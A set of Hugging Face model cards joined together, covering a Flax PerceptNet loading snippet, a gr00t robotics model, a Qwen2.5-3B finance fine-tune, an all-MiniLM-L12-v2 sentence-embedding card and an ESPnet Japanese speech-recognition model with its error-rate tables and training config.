```python
config_path = hf_hub_download(repo_id="Jorgvt/ppnet-baseline", filename="config.json")
with open(config_path, "r") as f:
    config = ConfigDict(json.load(f))
```

### 3. Download the weights

#### 3.1. Using `safetensors`

```python
from safetensors.flax import load_file

weights_path = hf_hub_download(repo_id="Jorgvt/ppnet-baseline", filename="weights.safetensors")
variables = load_file(weights_path)
variables = flax.traverse_util.unflatten_dict(variables, sep=".")
params = variables["params"]
```

#### 3.2. Using `msgpack`

```python
import jax
from jax import numpy as jnp

weights_path = hf_hub_download(repo_id="Jorgvt/ppnet-baseline", filename="weights.msgpack")
with open(weights_path, "rb") as f:
    variables = orbax.checkpoint.msgpack_utils.msgpack_restore(f.read())
variables = jax.tree_util.tree_map(lambda x: jnp.array(x), variables)
params = variables["params"]
```

### 4. Use the model

```python
from jax import numpy as jnp

model = PerceptNet(config)
pred = model.apply({"params": params}, jnp.ones((1, 384, 512, 3)))
```
phospho-app/JenniferJ-gr00t-Orange-brick-in-black-box-bvegk
phospho-app
2025-06-11T09:51:01Z
0
0
null
[ "safetensors", "gr00t_n1", "phosphobot", "gr00t", "region:us" ]
null
2025-06-11T09:33:42Z
---
tags:
- phosphobot
- gr00t
task_categories:
- robotics
---

# gr00t Model - phospho Training Pipeline

## This model was trained using **phospho**.

Training was successful; try it out on your robot!

## Training parameters:

- **Dataset**: [LegrandFrederic/Orange-brick-in-black-box](https://huggingface.co/datasets/LegrandFrederic/Orange-brick-in-black-box)
- **Wandb run URL**: None
- **Epochs**: 10
- **Batch size**: 27
- **Training steps**: None

📖 **Get Started**: [docs.phospho.ai](https://docs.phospho.ai?utm_source=huggingface_readme)

🤖 **Get your robot**: [robots.phospho.ai](https://robots.phospho.ai?utm_source=huggingface_readme)
ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance-1000-v4
ibrahimbukhariLingua
2025-06-11T09:45:38Z
0
0
transformers
[ "transformers", "safetensors", "generated_from_trainer", "trl", "sft", "base_model:Qwen/Qwen2.5-3B-Instruct", "base_model:finetune:Qwen/Qwen2.5-3B-Instruct", "endpoints_compatible", "region:us" ]
null
2025-06-11T09:45:23Z
---
base_model: Qwen/Qwen2.5-3B-Instruct
library_name: transformers
model_name: qwen2.5-3b-en-wikipedia-finance-1000-v4
tags:
- generated_from_trainer
- trl
- sft
licence: license
---

# Model Card for qwen2.5-3b-en-wikipedia-finance-1000-v4

This model is a fine-tuned version of [Qwen/Qwen2.5-3B-Instruct](https://huggingface.co/Qwen/Qwen2.5-3B-Instruct).
It has been trained using [TRL](https://github.com/huggingface/trl).

## Quick start

```python
from transformers import pipeline

question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="ibrahimbukhariLingua/qwen2.5-3b-en-wikipedia-finance-1000-v4", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```

## Training procedure

This model was trained with SFT.

### Framework versions

- TRL: 0.18.1
- Transformers: 4.52.4
- Pytorch: 2.7.1
- Datasets: 3.6.0
- Tokenizers: 0.21.1

## Citations

Cite TRL as:

```bibtex
@misc{vonwerra2022trl,
    title        = {{TRL: Transformer Reinforcement Learning}},
    author       = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
    year         = 2020,
    journal      = {GitHub repository},
    publisher    = {GitHub},
    howpublished = {\url{https://github.com/huggingface/trl}}
}
```
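For orientation, an illustrative sketch (not the released training script) of an SFT run with TRL as described above is shown below; the dataset name and configuration are placeholders, since the actual training corpus is not published with this card.

```python
# Illustrative SFT sketch with TRL; dataset and config are placeholders.
from datasets import load_dataset
from trl import SFTConfig, SFTTrainer

# A conversational text dataset; the finance corpus used for this model is not public.
train_dataset = load_dataset("trl-lib/Capybara", split="train")

trainer = SFTTrainer(
    model="Qwen/Qwen2.5-3B-Instruct",
    args=SFTConfig(output_dir="qwen2.5-3b-en-wikipedia-finance-1000-v4"),
    train_dataset=train_dataset,
)
trainer.train()
```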
EmaRimoldi/test-model
EmaRimoldi
2025-06-11T09:44:42Z
0
0
sentence-transformers
[ "sentence-transformers", "safetensors", "bert", "feature-extraction", "sentence-similarity", "transformers", "en", "dataset:s2orc", "dataset:flax-sentence-embeddings/stackexchange_xml", "dataset:ms_marco", "dataset:gooaq", "dataset:yahoo_answers_topics", "dataset:code_search_net", "dataset:search_qa", "dataset:eli5", "dataset:snli", "dataset:multi_nli", "dataset:wikihow", "dataset:natural_questions", "dataset:trivia_qa", "dataset:embedding-data/sentence-compression", "dataset:embedding-data/flickr30k-captions", "dataset:embedding-data/altlex", "dataset:embedding-data/simple-wiki", "dataset:embedding-data/QQP", "dataset:embedding-data/SPECTER", "dataset:embedding-data/PAQ_pairs", "dataset:embedding-data/WikiAnswers", "arxiv:1904.06472", "arxiv:2102.07033", "arxiv:2104.08727", "arxiv:1704.05179", "arxiv:1810.09305", "license:apache-2.0", "autotrain_compatible", "text-embeddings-inference", "endpoints_compatible", "region:us" ]
sentence-similarity
2025-06-11T09:44:32Z
---
language: en
license: apache-2.0
library_name: sentence-transformers
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
datasets:
- s2orc
- flax-sentence-embeddings/stackexchange_xml
- ms_marco
- gooaq
- yahoo_answers_topics
- code_search_net
- search_qa
- eli5
- snli
- multi_nli
- wikihow
- natural_questions
- trivia_qa
- embedding-data/sentence-compression
- embedding-data/flickr30k-captions
- embedding-data/altlex
- embedding-data/simple-wiki
- embedding-data/QQP
- embedding-data/SPECTER
- embedding-data/PAQ_pairs
- embedding-data/WikiAnswers
pipeline_tag: sentence-similarity
---

# all-MiniLM-L12-v2

This is a [sentence-transformers](https://www.SBERT.net) model: it maps sentences and paragraphs to a 384-dimensional dense vector space and can be used for tasks like clustering or semantic search.

## Usage (Sentence-Transformers)

Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:

```
pip install -U sentence-transformers
```

Then you can use the model like this:

```python
from sentence_transformers import SentenceTransformer

sentences = ["This is an example sentence", "Each sentence is converted"]

model = SentenceTransformer('sentence-transformers/all-MiniLM-L12-v2')
embeddings = model.encode(sentences)
print(embeddings)
```

## Usage (HuggingFace Transformers)

Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: first, you pass your input through the transformer model, then you have to apply the right pooling operation on top of the contextualized word embeddings.

```python
from transformers import AutoTokenizer, AutoModel
import torch
import torch.nn.functional as F

# Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
    token_embeddings = model_output[0]  # First element of model_output contains all token embeddings
    input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
    return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)

# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']

# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('sentence-transformers/all-MiniLM-L12-v2')
model = AutoModel.from_pretrained('sentence-transformers/all-MiniLM-L12-v2')

# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')

# Compute token embeddings
with torch.no_grad():
    model_output = model(**encoded_input)

# Perform pooling
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])

# Normalize embeddings
sentence_embeddings = F.normalize(sentence_embeddings, p=2, dim=1)

print("Sentence embeddings:")
print(sentence_embeddings)
```

------

## Background

The project aims to train sentence embedding models on very large sentence-level datasets using a self-supervised contrastive learning objective. We used the pretrained [`microsoft/MiniLM-L12-H384-uncased`](https://huggingface.co/microsoft/MiniLM-L12-H384-uncased) model and fine-tuned it on a dataset of 1B sentence pairs. We use a contrastive learning objective: given a sentence from the pair, the model should predict which one, out of a set of randomly sampled other sentences, was actually paired with it in our dataset.
We developed this model during the [Community week using JAX/Flax for NLP & CV](https://discuss.huggingface.co/t/open-to-the-community-community-week-using-jax-flax-for-nlp-cv/7104), organized by Hugging Face, as part of the project [Train the Best Sentence Embedding Model Ever with 1B Training Pairs](https://discuss.huggingface.co/t/train-the-best-sentence-embedding-model-ever-with-1b-training-pairs/7354). We benefited from efficient hardware infrastructure to run the project (7 TPU v3-8 devices), as well as guidance from Google's Flax, JAX, and Cloud team members on efficient deep learning frameworks.

## Intended uses

Our model is intended to be used as a sentence and short-paragraph encoder. Given an input text, it outputs a vector which captures the semantic information. The sentence vector may be used for information retrieval, clustering or sentence similarity tasks.

By default, input text longer than 256 word pieces is truncated.

## Training procedure

### Pre-training

We use the pretrained [`microsoft/MiniLM-L12-H384-uncased`](https://huggingface.co/microsoft/MiniLM-L12-H384-uncased) model. Please refer to the model card for more detailed information about the pre-training procedure.

### Fine-tuning

We fine-tune the model using a contrastive objective. Formally, we compute the cosine similarity between each possible sentence pair from the batch. We then apply the cross-entropy loss by comparing with the true pairs.

#### Hyperparameters

We trained our model on a TPU v3-8. We trained the model for 100k steps using a batch size of 1024 (128 per TPU core), with a learning-rate warm-up of 500 steps. The sequence length was limited to 128 tokens. We used the AdamW optimizer with a 2e-5 learning rate. The full training script is accessible in this current repository: `train_script.py`.

#### Training data

We use the concatenation of multiple datasets to fine-tune our model. The total number of sentence pairs is above 1 billion. We sampled each dataset given a weighted probability; the configuration is detailed in the `data_config.json` file.
| Dataset | Paper | Number of training tuples |
|--------------------------------------------------------|:----------------------------------------:|:--------------------------:|
| [Reddit comments (2015-2018)](https://github.com/PolyAI-LDN/conversational-datasets/tree/master/reddit) | [paper](https://arxiv.org/abs/1904.06472) | 726,484,430 |
| [S2ORC](https://github.com/allenai/s2orc) Citation pairs (Abstracts) | [paper](https://aclanthology.org/2020.acl-main.447/) | 116,288,806 |
| [WikiAnswers](https://github.com/afader/oqa#wikianswers-corpus) Duplicate question pairs | [paper](https://doi.org/10.1145/2623330.2623677) | 77,427,422 |
| [PAQ](https://github.com/facebookresearch/PAQ) (Question, Answer) pairs | [paper](https://arxiv.org/abs/2102.07033) | 64,371,441 |
| [S2ORC](https://github.com/allenai/s2orc) Citation pairs (Titles) | [paper](https://aclanthology.org/2020.acl-main.447/) | 52,603,982 |
| [S2ORC](https://github.com/allenai/s2orc) (Title, Abstract) | [paper](https://aclanthology.org/2020.acl-main.447/) | 41,769,185 |
| [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) (Title, Body) pairs | - | 25,316,456 |
| [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) (Title+Body, Answer) pairs | - | 21,396,559 |
| [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) (Title, Answer) pairs | - | 21,396,559 |
| [MS MARCO](https://microsoft.github.io/msmarco/) triplets | [paper](https://doi.org/10.1145/3404835.3462804) | 9,144,553 |
| [GOOAQ: Open Question Answering with Diverse Answer Types](https://github.com/allenai/gooaq) | [paper](https://arxiv.org/pdf/2104.08727.pdf) | 3,012,496 |
| [Yahoo Answers](https://www.kaggle.com/soumikrakshit/yahoo-answers-dataset) (Title, Answer) | [paper](https://proceedings.neurips.cc/paper/2015/hash/250cf8b51c773f3f8dc8b4be867a9a02-Abstract.html) | 1,198,260 |
| [Code Search](https://huggingface.co/datasets/code_search_net) | - | 1,151,414 |
| [COCO](https://cocodataset.org/#home) Image captions | [paper](https://link.springer.com/chapter/10.1007%2F978-3-319-10602-1_48) | 828,395 |
| [SPECTER](https://github.com/allenai/specter) citation triplets | [paper](https://doi.org/10.18653/v1/2020.acl-main.207) | 684,100 |
| [Yahoo Answers](https://www.kaggle.com/soumikrakshit/yahoo-answers-dataset) (Question, Answer) | [paper](https://proceedings.neurips.cc/paper/2015/hash/250cf8b51c773f3f8dc8b4be867a9a02-Abstract.html) | 681,164 |
| [Yahoo Answers](https://www.kaggle.com/soumikrakshit/yahoo-answers-dataset) (Title, Question) | [paper](https://proceedings.neurips.cc/paper/2015/hash/250cf8b51c773f3f8dc8b4be867a9a02-Abstract.html) | 659,896 |
| [SearchQA](https://huggingface.co/datasets/search_qa) | [paper](https://arxiv.org/abs/1704.05179) | 582,261 |
| [Eli5](https://huggingface.co/datasets/eli5) | [paper](https://doi.org/10.18653/v1/p19-1346) | 325,475 |
| [Flickr 30k](https://shannon.cs.illinois.edu/DenotationGraph/) | [paper](https://transacl.org/ojs/index.php/tacl/article/view/229/33) | 317,695 |
| [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) Duplicate questions (titles) | | 304,525 |
| AllNLI ([SNLI](https://nlp.stanford.edu/projects/snli/) and [MultiNLI](https://cims.nyu.edu/~sbowman/multinli/)) | [paper SNLI](https://doi.org/10.18653/v1/d15-1075), [paper MultiNLI](https://doi.org/10.18653/v1/n18-1101) | 277,230 |
| [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) Duplicate questions (bodies) | | 250,519 |
| [Stack Exchange](https://huggingface.co/datasets/flax-sentence-embeddings/stackexchange_xml) Duplicate questions (titles+bodies) | | 250,460 |
| [Sentence Compression](https://github.com/google-research-datasets/sentence-compression) | [paper](https://www.aclweb.org/anthology/D13-1155/) | 180,000 |
| [Wikihow](https://github.com/pvl/wikihow_pairs_dataset) | [paper](https://arxiv.org/abs/1810.09305) | 128,542 |
| [Altlex](https://github.com/chridey/altlex/) | [paper](https://aclanthology.org/P16-1135.pdf) | 112,696 |
| [Quora Question Triplets](https://quoradata.quora.com/First-Quora-Dataset-Release-Question-Pairs) | - | 103,663 |
| [Simple Wikipedia](https://cs.pomona.edu/~dkauchak/simplification/) | [paper](https://www.aclweb.org/anthology/P11-2117/) | 102,225 |
| [Natural Questions (NQ)](https://ai.google.com/research/NaturalQuestions) | [paper](https://transacl.org/ojs/index.php/tacl/article/view/1455) | 100,231 |
| [SQuAD2.0](https://rajpurkar.github.io/SQuAD-explorer/) | [paper](https://aclanthology.org/P18-2124.pdf) | 87,599 |
| [TriviaQA](https://huggingface.co/datasets/trivia_qa) | - | 73,346 |
| **Total** | | **1,170,060,424** |
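The fine-tuning objective described above amounts to an in-batch softmax over cosine similarities. A minimal sketch in PyTorch is shown below; the scale factor is an assumption (common values are 20 to 100), and the exact value used in training is defined in `train_script.py`.

```python
# Minimal sketch of the in-batch contrastive objective: score cosine
# similarities between all pairs in the batch, then use cross-entropy to
# push each sentence toward its true partner (the diagonal).
import torch
import torch.nn.functional as F

def contrastive_loss(emb_a: torch.Tensor, emb_b: torch.Tensor, scale: float = 20.0) -> torch.Tensor:
    # emb_a[i] and emb_b[i] are the embeddings of the i-th true pair.
    emb_a = F.normalize(emb_a, p=2, dim=1)
    emb_b = F.normalize(emb_b, p=2, dim=1)
    scores = scale * emb_a @ emb_b.T                          # (batch, batch) cosine similarities
    labels = torch.arange(scores.size(0), device=scores.device)  # diagonal holds the true pairs
    return F.cross_entropy(scores, labels)
```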
fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132
fujie
2025-06-11T09:44:09Z
0
0
espnet
[ "espnet", "audio", "automatic-speech-recognition", "jp", "dataset:cejc_pron_aux", "arxiv:1804.00015", "license:cc-by-4.0", "region:us" ]
automatic-speech-recognition
2025-06-11T09:41:06Z
---
tags:
- espnet
- audio
- automatic-speech-recognition
language: jp
datasets:
- cejc_pron_aux
license: cc-by-4.0
---

## ESPnet2 ASR model

### `fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132`

This model was trained by Shinya Fujie using the cejc_pron_aux recipe in [espnet](https://github.com/espnet/espnet/).

### Demo: How to use in ESPnet2

Follow the [ESPnet installation instructions](https://espnet.github.io/espnet/installation.html) if you haven't done that already.

```bash
cd espnet
git checkout 03f77b8db5be7503c3a540b113178b34cfbccee8
pip install -e .
cd egs2/cejc_pron_aux/asr1
./run.sh --skip_data_prep false --skip_train true --download_model fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132
```

<!-- Generated by scripts/utils/show_asr_result.sh -->

# RESULTS

## Environments

- date: `Wed Jun 11 12:40:31 JST 2025`
- python version: `3.11.11 (main, Dec 11 2024, 16:28:39) [GCC 11.2.0]`
- espnet version: `espnet 202503`
- pytorch version: `pytorch 2.3.0+cu121`
- Git hash: `03f77b8db5be7503c3a540b113178b34cfbccee8`
- Commit date: `Tue Jun 10 16:01:35 2025 +0900`

## exp/asr_train_asr_cbs_transducer_081616_hop132

### WER

|dataset|Snt|Wrd|Corr|Sub|Del|Ins|Err|S.Err|
|---|---|---|---|---|---|---|---|---|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10f|953|11908|84.6|8.4|7.0|4.0|19.4|63.1|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10m|957|16092|86.8|8.0|5.2|4.3|17.5|66.1|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20f|1466|18326|87.3|7.3|5.5|3.3|16.1|62.3|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20m|1772|23756|82.6|10.2|7.2|4.2|21.6|64.1|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30f|1734|24116|90.6|5.4|4.0|3.6|13.0|55.6|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30m|1688|20116|69.3|17.9|12.8|4.3|35.0|66.9|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40f|1477|20717|85.9|6.9|7.2|3.6|17.7|58.4|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40m|1498|24747|87.1|6.7|6.2|3.5|16.3|63.2|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50f|1450|26584|90.1|5.1|4.8|3.4|13.4|62.5|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50m|1499|22572|87.9|6.8|5.3|3.6|15.7|62.3|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60f|1335|21810|81.7|10.4|7.8|4.4|22.7|65.0|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60m|1621|24151|83.1|9.4|7.5|3.3|20.2|68.2|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70f|906|9542|83.8|8.8|7.3|4.2|20.4|57.2|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70m|894|12490|88.1|7.0|4.9|4.6|16.4|58.3|

### CER

|dataset|Snt|Wrd|Corr|Sub|Del|Ins|Err|S.Err|
|---|---|---|---|---|---|---|---|---|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10f|953|24583|88.0|5.0|7.0|4.0|15.9|63.1|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval10m|957|33749|90.1|4.6|5.3|4.1|14.0|66.1|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20f|1466|37024|89.8|4.6|5.7|3.1|13.3|62.3|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval20m|1772|47838|86.9|6.4|6.7|4.1|17.2|64.1|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30f|1734|48968|92.5|3.3|4.2|3.7|11.2|55.6|
|decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval30m|1688|41067|77.2|11.0|11.8|4.3|27.1|66.9| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40f|1477|42609|88.3|4.3|7.4|3.4|15.2|58.4| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval40m|1498|51748|88.8|4.1|7.0|3.3|14.5|63.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50f|1450|54181|91.8|3.5|4.7|3.4|11.6|62.5| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval50m|1499|46031|90.5|4.2|5.3|3.4|13.0|62.3| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60f|1335|45028|86.1|6.3|7.6|4.0|17.8|65.0| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval60m|1621|49442|86.7|5.5|7.8|3.2|16.5|68.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70f|906|19386|87.2|5.4|7.4|4.2|17.0|57.2| |decode_cbs_transducer_asr_model_valid.cer_transducer.ave_10best/eval70m|894|26203|90.8|4.4|4.9|4.6|13.8|58.3| ### TER |dataset|Snt|Wrd|Corr|Sub|Del|Ins|Err|S.Err| |---|---|---|---|---|---|---|---|---| ## ASR config <details><summary>expand</summary> ``` config: myconf/train_asr_cbs_transducer_081616_hop132.yaml print_config: false log_level: INFO drop_last_iter: false dry_run: false iterator_type: sequence valid_iterator_type: null output_dir: exp/asr_train_asr_cbs_transducer_081616_hop132 ngpu: 1 seed: 0 num_workers: 1 num_att_plot: 0 dist_backend: nccl dist_init_method: env:// dist_world_size: 2 dist_rank: 0 local_rank: 0 dist_master_addr: localhost dist_master_port: 48739 dist_launcher: null multiprocessing_distributed: true unused_parameters: false sharded_ddp: false use_deepspeed: false deepspeed_config: null gradient_as_bucket_view: true ddp_comm_hook: null cudnn_enabled: true cudnn_benchmark: false cudnn_deterministic: true use_tf32: false collect_stats: false write_collected_feats: false max_epoch: 50 patience: null val_scheduler_criterion: - valid - loss early_stopping_criterion: - valid - loss - min best_model_criterion: - - valid - cer_transducer - min keep_nbest_models: 10 nbest_averaging_interval: 0 grad_clip: 5 grad_clip_type: 2.0 grad_noise: false accum_grad: 6 no_forward_run: false resume: true train_dtype: float32 use_amp: false log_interval: null use_matplotlib: true use_tensorboard: true create_graph_in_tensorboard: false use_wandb: true wandb_project: espnet_ninjal wandb_id: null wandb_entity: null wandb_name: cejc_cbs_td_081616_hop132 wandb_model_log_interval: -1 detect_anomaly: false use_adapter: false adapter: lora save_strategy: all adapter_conf: {} pretrain_path: null init_param: [] ignore_init_mismatch: false freeze_param: [] num_iters_per_epoch: null batch_size: 20 valid_batch_size: null batch_bins: 1500000 valid_batch_bins: null category_sample_size: 10 train_shape_file: - exp/asr_stats_raw_jp_word/train/speech_shape - exp/asr_stats_raw_jp_word/train/text_shape.word valid_shape_file: - exp/asr_stats_raw_jp_word/valid/speech_shape - exp/asr_stats_raw_jp_word/valid/text_shape.word batch_type: numel valid_batch_type: null fold_length: - 80000 - 150 sort_in_batch: descending shuffle_within_batch: false sort_batch: descending multiple_iterator: false chunk_length: 500 chunk_shift_ratio: 0.5 num_cache_chunks: 1024 chunk_excluded_key_prefixes: [] chunk_default_fs: null chunk_max_abs_length: null chunk_discard_short_samples: true train_data_path_and_name_and_type: - - dump/raw/train_nodup/wav.scp - speech - sound - - dump/raw/train_nodup/text - text - text 
valid_data_path_and_name_and_type: - - dump/raw/train_dev/wav.scp - speech - sound - - dump/raw/train_dev/text - text - text multi_task_dataset: false allow_variable_data_keys: false max_cache_size: 0.0 max_cache_fd: 32 allow_multi_rates: false valid_max_cache_size: null exclude_weight_decay: false exclude_weight_decay_conf: {} optim: adam optim_conf: lr: 0.002 scheduler: warmuplr scheduler_conf: warmup_steps: 25000 token_list: - <blank> - <unk> - '|' - ー - ン - イ - ッ - カ - ナ - テ - ト - タ - ア - ノ - デ - ダ - ソ - コ - <sp> - ウ - シ - モ - ラ - ネ - ル - ス - ワ - オ - マ - ニ - ク - レ - ガ - ヨ - キ - サ - ケ - ヤ - エ - ド - ツ - ハ - リ - チ - ミ - ユ - ジ - ホ - ジャ - ロ - セ - ゴ - ノ+F - メ - バ - ア+F - ブ - チャ - ショ - フ - <mask> - ヒ - ー+F - チョ - パ - ジュ - ゼ - ベ - ズ - グ - ム - ヘ - ゲ - キョ - ジョ - ビ - ン+D - ボ - シュ - ギ - シャ - エ+F - ザ - プ - ト+F - イ+D - ソ+F - キュ - チュ - ポ - リョ - ゾ - ス+D - キャ - ピ - ン+F - ー+D - ッ+F - ウ+D - ヒャ - ア+D - ナ+D - オ+D - ヌ - コ+D - カ+D - ギョ - シ+D - ペ - リャ - ニュ - ソ+D - ッ+D - ティ - ツ+D - ク+D - ハ+D - タ+D - ギャ - ト+D - ヒョ - ディ - エ+D - キ+D - ダ+D - ド+D - ヤ+D - マ+D - ファ - ヒ+D - ホ+D - サ+D - モ+D - フ+D - ヨ+D - ワ+D - ミ+D - ウ+F - ビョ - チ+D - フォ - ム+D - リュ - フェ - ジ+D - ユ+D - ニ+D - ジェ - ケ+D - ガ+D - セ+D - デ+D - ラ+D - フィ - ノ+D - テ+D - ギュ - チェ - リ+D - ズ+D - ミョ - ゼ+D - ニャ - ル+D - ビャ - メ+D - シュ+D - ピョ - ロ+D - ブ+D - バ+D - ショ+D - ウェ - ゴ+D - ヘ+D - トゥ - ピャ - ネ+D - チョ+D - ジュ+D - グ+D - ウィ - レ+D - ビュ - ヌ+D - ニョ - ゲ+D - ボ+D - ビ+D - シェ - キョ+D - パ+D - チュ+D - オ+F - ベ+D - ウォ - ミュ - チャ+D - シャ+D - キュ+D - ピュ - ザ+D - ギ+D - ドゥ - プ+D - ジョ+D - ジャ+D - ヒュ - リョ+D - ポ+D - ミャ - デュ - ヒャ+D - ゾ+D - キャ+D - ピ+D - ペ+D - ファ+D - ヒョ+D - ツォ - ツァ - チェ+D - ギョ+D - ディ+D - トゥ+D - イ+F - フォ+D - ニュ+D - ツェ - ビョ+D - ドゥ+D - フェ+D - ギャ+D - ジェ+D - ティ+D - ナ+F - リュ+D - ヤ+F - フィ+D - ニャ+D - テュ - ビュ+D - ニェ - ヌ+F - ウェ+D - ヴィ - ミャ+D - ヴォ - ド+F - シェ+D - ギュ+D - ホ+F - ツィ - ワ+F - ル+F - ダ+F - マ+F - ウィ+D - ガ+F - ピャ+D - メ+F - スィ - ビャ+D - ニョ+F - ロ+F - ウォ+D - ネ+F - ヴァ - ヴ - フュ - ミョ+D - ズ+F - ヴィ+D - ニャ+F - ミュ+F - デュ+D - ニョ+D - ミュ+D - ツォ+F - ヒェ+D - ヒュ+D - カ+F - ユ+F - リャ+D - ブ+F - ヘ+F - ハ+F - ツォ+D - <sos/eos> init: null input_size: null ctc_conf: dropout_rate: 0.0 ctc_type: builtin reduce: true ignore_nan_grad: null zero_infinity: true brctc_risk_strategy: exp brctc_group_strategy: end brctc_risk_factor: 0.0 joint_net_conf: joint_space_size: 640 use_preprocessor: true use_lang_prompt: false use_nlp_prompt: false token_type: word bpemodel: null non_linguistic_symbols: null cleaner: null g2p: null speech_volume_normalize: null rir_scp: null rir_apply_prob: 1.0 noise_scp: null noise_apply_prob: 1.0 noise_db_range: '13_15' short_noise_thres: 0.5 aux_ctc_tasks: [] frontend: default frontend_conf: hop_length: 132 fs: 16k specaug: specaug specaug_conf: apply_time_warp: true time_warp_window: 5 time_warp_mode: bicubic apply_freq_mask: true freq_mask_width_range: - 0 - 30 num_freq_mask: 2 apply_time_mask: true time_mask_width_range: - 0 - 40 num_time_mask: 2 normalize: global_mvn normalize_conf: stats_file: exp/asr_stats_raw_jp_word/train/feats_stats.npz model: espnet model_conf: ctc_weight: 0.0 report_cer: true report_wer: true preencoder: null preencoder_conf: {} encoder: contextual_block_conformer encoder_conf: output_size: 256 attention_heads: 4 linear_units: 2048 num_blocks: 12 dropout_rate: 0.1 positional_dropout_rate: 0.1 attention_dropout_rate: 0.0 input_layer: conv2d normalize_before: true activation_type: swish macaron_style: true use_cnn_module: true cnn_module_kernel: 15 block_size: 40 hop_size: 16 look_ahead: 16 init_average: true ctx_pos_enc: true postencoder: null postencoder_conf: {} decoder: 
transducer
decoder_conf:
    rnn_type: lstm
    num_layers: 1
    hidden_size: 512
    dropout: 0.1
    dropout_embed: 0.2
preprocessor: default
preprocessor_conf: {}
required:
- output_dir
- token_list
version: '202503'
distributed: true
```

</details>

### Citing ESPnet

```BibTex
@inproceedings{watanabe2018espnet,
  author={Shinji Watanabe and Takaaki Hori and Shigeki Karita and Tomoki Hayashi and Jiro Nishitoba and Yuya Unno and Nelson Yalta and Jahn Heymann and Matthew Wiesner and Nanxin Chen and Adithya Renduchintala and Tsubasa Ochiai},
  title={{ESPnet}: End-to-End Speech Processing Toolkit},
  year={2018},
  booktitle={Proceedings of Interspeech},
  pages={2207--2211},
  doi={10.21437/Interspeech.2018-1456},
  url={http://dx.doi.org/10.21437/Interspeech.2018-1456}
}
```

or arXiv:

```bibtex
@misc{watanabe2018espnet,
  title={ESPnet: End-to-End Speech Processing Toolkit},
  author={Shinji Watanabe and Takaaki Hori and Shigeki Karita and Tomoki Hayashi and Jiro Nishitoba and Yuya Unno and Nelson Yalta and Jahn Heymann and Matthew Wiesner and Nanxin Chen and Adithya Renduchintala and Tsubasa Ochiai},
  year={2018},
  eprint={1804.00015},
  archivePrefix={arXiv},
  primaryClass={cs.CL}
}
```
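For quick inference outside the recipe, a minimal sketch is shown below, assuming the standard (non-streaming) ESPnet2 inference interface; the wav path is a placeholder, and input audio should be 16 kHz mono. For streaming decoding, use the recipe above.

```python
# Minimal sketch, assuming the standard ESPnet2 ASR inference interface.
import soundfile
from espnet2.bin.asr_inference import Speech2Text

speech2text = Speech2Text.from_pretrained(
    "fujie/espnet_asr_cejc_pron_aux_cbs_transducer_081616_hop132"
)

speech, rate = soundfile.read("sample_16k.wav")  # placeholder path, 16 kHz mono
nbests = speech2text(speech)
text, tokens, token_ids, hyp = nbests[0]
print(text)
```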